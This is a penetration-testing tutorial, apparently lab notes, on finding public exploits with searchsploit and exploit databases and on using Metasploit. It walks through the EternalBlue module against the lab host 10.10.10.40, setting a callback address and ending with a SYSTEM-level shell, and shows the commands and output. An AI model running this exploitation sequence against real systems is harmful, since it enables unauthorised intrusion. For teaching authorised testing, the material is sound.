Public Exploits

  • Once we identify the services running on ports identified from our Nmap scan, the first step is to look if any of the applications/services have any public exploits.
  • Public exploits can be found for web applications and other applications running on open ports, like SSH or ftp.

Finding Public Exploits

  • Google for the application name with exploit to see if we get any results Ex- “windows 7 smb exploit”
  • A well-known tool for this purpose is searchsploit, which we can use to search for public vulnerabilities/exploits for any application. We can install it with the following command:

sudo apt install exploitdb -y

  • Then, we can use searchsploit to search for a specific application by its name, as follows:

searchsploit openssh 7.2

  • We can also utilize online exploit databases to search for vulnerabilities, like Exploit DB, Rapid7 DB, or Vulnerability Lab.

Metasploit Primer

-The Metasploit Framework (MSF) is an excellent tool for pentesters. It contains many built-in exploits for many public vulnerabilities and provides an easy way to use these exploits against vulnerable targets.

  • MSF has many other features, like:

    • Running reconnaissance scripts to enumerate remote hosts and compromised targets
    • Verification scripts to test the existence of a vulnerability without actually compromising the target
    • Meterpreter, which is a great tool to connect to shells and run commands on the compromised targets
    • Many post-exploitation and pivoting tools

  • Let us take a basic example of searching for an exploit for an application we are attacking and how to exploit it. To run Metasploit, we can use the msfconsole command:

msfconsole

  • Once we have Metasploit running, we can search for our target application with the search exploit command. For example, we can search for the SMB vulnerability we identified previously:

search exploit eternalblue

Tip: Search can apply complex filters such as search cve:2009 type:exploit. See all the filters with help search

  • We found one exploit for this service. We can use it by copying the full name of it and using USE to use it:

use exploit/windows/smb/ms17_010_psexec

  • Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command.
  • Any option with Required set to yes needs to be set for the exploit to work. In this case, we only have to options to set: RHOSTS, which means the IP of our target (this can be one IP, multiple IPs, or a file containing a list of IPs). We can set them with the set command:

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40

msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0

  • Once we have both options set, we can start the exploitation. However, before we run the script, we can run a check to ensure the server is vulnerable:

check

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
  • As we can see, the server is vulnerable. Note that not every exploit in the Metasploit Framework supports the check function. Finally, we can use the run or exploit command to run the exploit:

exploit

Result:

C:\WINDOWS\system32>whoami

NT AUTHORITY\SYSTEM

  • As we can see, we have been able to gain admin access to the box and used the shell command to drop us into an interactive shell.
  • These are basic examples of using Metasploit to exploit a vulnerability on a remote server.